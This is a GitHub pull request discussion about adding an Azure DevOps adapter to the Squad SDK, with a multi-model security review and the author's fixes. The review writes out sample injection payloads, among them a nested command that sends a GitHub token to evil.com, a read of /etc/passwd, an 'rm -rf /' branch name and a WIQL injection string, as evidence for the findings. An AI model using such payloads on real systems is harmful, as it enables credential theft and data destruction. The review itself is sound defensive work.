feat: Azure DevOps platform adapter — Squad for enterprise

[tamirdresher]

Azure DevOps Platform Adapter

Problem

Squad is tightly coupled to GitHub (Issues, Labels, PRs, Actions). Many enterprise teams use Azure DevOps. Ralph can't scan ADO work items, the coordinator can't create ADO PRs, and the triage workflows don't work with ADO.

Solution

Add a platform adapter abstraction that lets Squad work with both GitHub and Azure DevOps.

Platform Adapter (packages/squad-sdk/src/platform/)

• PlatformAdapter interface: listWorkItems, createPR, mergePR, addTag, etc.
• GitHubAdapter: wraps existing gh CLI calls
• AzureDevOpsAdapter: uses az devops CLI / REST API
• detectPlatform(): auto-detect from git remote URL (github.com vs dev.azure.com)
• getRalphScanCommands(): platform-specific Ralph commands

Concept Mapping

GitHub	Azure DevOps
Issues	Work Items (WIQL)
Labels	Tags + Area Paths
gh CLI	az devops CLI
Actions	Azure Pipelines

Coordinator (templates/squad.agent.md)

• Platform Detection section: detect GitHub vs ADO from remote
• Platform-specific Ralph commands for scanning work

Tests: 57 new tests — platform detection, remote URL parsing, adapter interfaces, Ralph command generation

Docs: Feature guide + PRD

Files

• 15 files, ~1,303 insertions
• New: packages/squad-sdk/src/platform/ (types, detect, github, azure-devops, ralph-commands, index)
• Updated: index.ts, types.ts, squad.agent.md
• Tests: test/platform-adapter.test.ts
• Docs: azure-devops.md, platform-adapter-prd.md

Co-authored-by: Copilot 223556219+Copilot@users.noreply.github.com

[wiisaacs]

5-Model Code Review PR #191 (Updated with test validation)

Ran this PR through 5 different AI models (Claude Sonnet 4, Claude Opus 4.5, GPT-5.2, Gemini 3 Pro, Claude Haiku 4.5) for independent review, then wrote unit tests to validate each finding. Only confirmed issues are listed below.

---

��� Critical Shell Command Injection (5/5 models flagged, confirmed by tests)

All adapters build shell commands via string interpolation and run them through execSync(). Only " is escaped backticks, $(), ;, &, | all pass through and are exploitable.

Test-proven attack vectors:

• WIQL injection: state = "Active' OR 1=1 --" breaks out of the WIQL clause
• Command substitution: title of Fix bug `whoami` or Fix bug $(cat /etc/passwd) executes in the shell
• Nested substitution: $(curl evil.com/steal?token=$(gh auth token)) in a GitHub comment

This breaks the project's existing norms. The codebase already uses the safe pattern:

• upstream.ts execFileSync('git', ['clone', '--depth', '1', ...])
• rc-tunnel.ts → execFileSync('devtunnel', ['create', ...])
• aspire.ts spawn('docker', [...args])

Fix: Replace execSync(cmd) with execFileSync(binary, [args]) everywhere.

Critical createBranch injection (4/5 models flagged, confirmed by tests)

Both adapters run git checkout -b ${name} with zero quoting. Test proves:

input:  "feature; rm -rf / #"
output: "git checkout main && git pull && git checkout -b feature; rm -rf / #"

The fromBranch parameter is equally unprotected.

---

High confirmed by tests

Finding	Models	Test result
PlannerAdapter doesn't implement PlatformAdapter	3/5	Missing PR/branch methods, no implements keyword runtime crash if used polymorphically. Consider splitting into WorkItemAdapter + RepoAdapter.
Planner task ID hash collisions + non-reversibility	2/5	✅ Found 1 collision in just 100K synthetic IDs. More critically, the hash is non-reversible once listWorkItems returns a numeric ID, you can't call PATCH /planner/tasks/{originalStringId} because the original Planner ID is lost. This breaks all update operations.
Bearer token in curl process args	2/5	Not testable locally, but the code clearly passes the token as a CLI argument visible in process listings. Use Node fetch/undici instead of shelling out to curl.
Planner PATCH missing If-Match/ETag	1/5	Not testable locally, but per Graph API docs Planner updates require concurrency headers.

Medium confirmed by tests

Finding	Models	Test result
No JSON.parse error handling	2/5	CLI warnings (WARNING: The command requires...), auth errors (AADSTS700082), rate limits, and empty output all throw unhelpful SyntaxError. Wrap in try-catch with raw output in error message.
No integration tests for adapters	2/5	Tests cover detection/mocks only, not command construction or output parsing with mocked execSync.
N+1 CLI calls in ADO listWorkItems	1/5	Not testable locally, but the code clearly runs 1 WIQL query + N individual az boards work-item show calls.
Hardcoded "User Story" work item type	1/5	Not testable locally, but fails for Scrum ("PBI") and Basic ("Issue") ADO processes.

Retracted false positive

Finding	Models	Test result
ADO tags with semicolons break parsing	1/5	ADO uses semicolons as its native tag delimiter tags cannot contain semicolons. The split(';') is correct.

---

What's Good

The architecture is solid. The PlatformAdapter interface is well-designed, detectPlatform() from git remote is elegant, and the concept mapping (IssuesWork Items, LabelsTags, etc.) is thoughtful. The provider-pluggable pattern is exactly what the community asked for in #8. Looking forward to this landing!

[tamirdresher]

Thanks for the thorough 5-model review @wiisaacs — really appreciate the rigor, especially writing tests to validate each finding!

Fixed in latest push (20af91a):

• Critical: Shell injection — All adapters now use execFileSync(binary, [args]) instead of execSync(cmd). No user input passes through shell interpretation. Follows the existing codebase patterns (upstream.ts, rc-tunnel.ts, aspire.ts).
• Critical: createBranch injection — Now uses separate execFileSync('git', [...]) calls instead of string concatenation with &&.
• High: JSON.parse error handling — Added parseJson() helper across all adapters with raw output in error messages.
• High: Bearer token exposure — Planner adapter uses execFileSync('curl', [...]) with args array.
• High: Planner task ID — Original string ID preserved in url field for downstream PATCH calls.

Acknowledged but deferred:

• PlannerAdapter partial interface — split into WorkItemAdapter + RepoAdapter in follow-up PR
• Planner ETag/If-Match — will add concurrency headers in follow-up
• N+1 ADO queries — noted for future optimization
• Hardcoded User Story type — createWorkItem accepts a type param, default should be configurable

Thanks again — the injection findings were spot-on.

[wiisaacs]

Thanks @tamirdresher the execFileSync refactor is a great improvement and the parseJson helper is clean. The shell injection issues are solidly resolved.

Ran the updated code through the same 5-model review and two findings came back as not fully addressed yet:

1. WIQL query injection (5/5 models flagged)

The execFileSync fix prevents shell injection perfectly, but state and tags are still interpolated directly into the WIQL string:

conditions.push(`[System.State] = '${options.state}'`);
conditions.push(`[System.Tags] Contains '${tag}'`);

A value like Active' OR 1=1 -- would manipulate the WIQL query itself this is query-language injection, similar to SQL injection, which lives at a different layer than shell injection.

Likely fix: escape single quotes per WIQL syntax (' ''), or validate state/tags against an allowlist of expected values.

2. Bearer token still visible in process args (4/5 models flagged)

execFileSync('curl', ['-H', 'Authorization: Bearer ${token}']) prevents shell expansion, but command-line arguments are still visible via ps aux or /proc/<pid>/cmdline on Linux (and Task Manager on Windows). The token exposure concern was about process inspection, not shell interpretation.

Easiest fix would be swapping curl for Node's native fetch or undici so the token stays in-memory and never hits a process argument list.

Everything else looks great the createBranch split, parseJson helper, and task ID preservation all check out. Nice work!

[tamirdresher]

Both addressed in latest push (5daf83e):

1. WIQL injection — Added escapeWiql() helper that doubles single quotes (WIQL's escape syntax, same as SQL). Applied to state, tags, and project name values. Active' OR 1=1 -- now becomes Active'' OR 1=1 -- which is a harmless literal string in WIQL.

2. Bearer token — Changed graphFetch() to pass the Authorization header via curl --config - (stdin) instead of as a CLI argument. Token no longer appears in process args visible via ps/procfs.

Thanks for the follow-up — both were good catches at the right layer.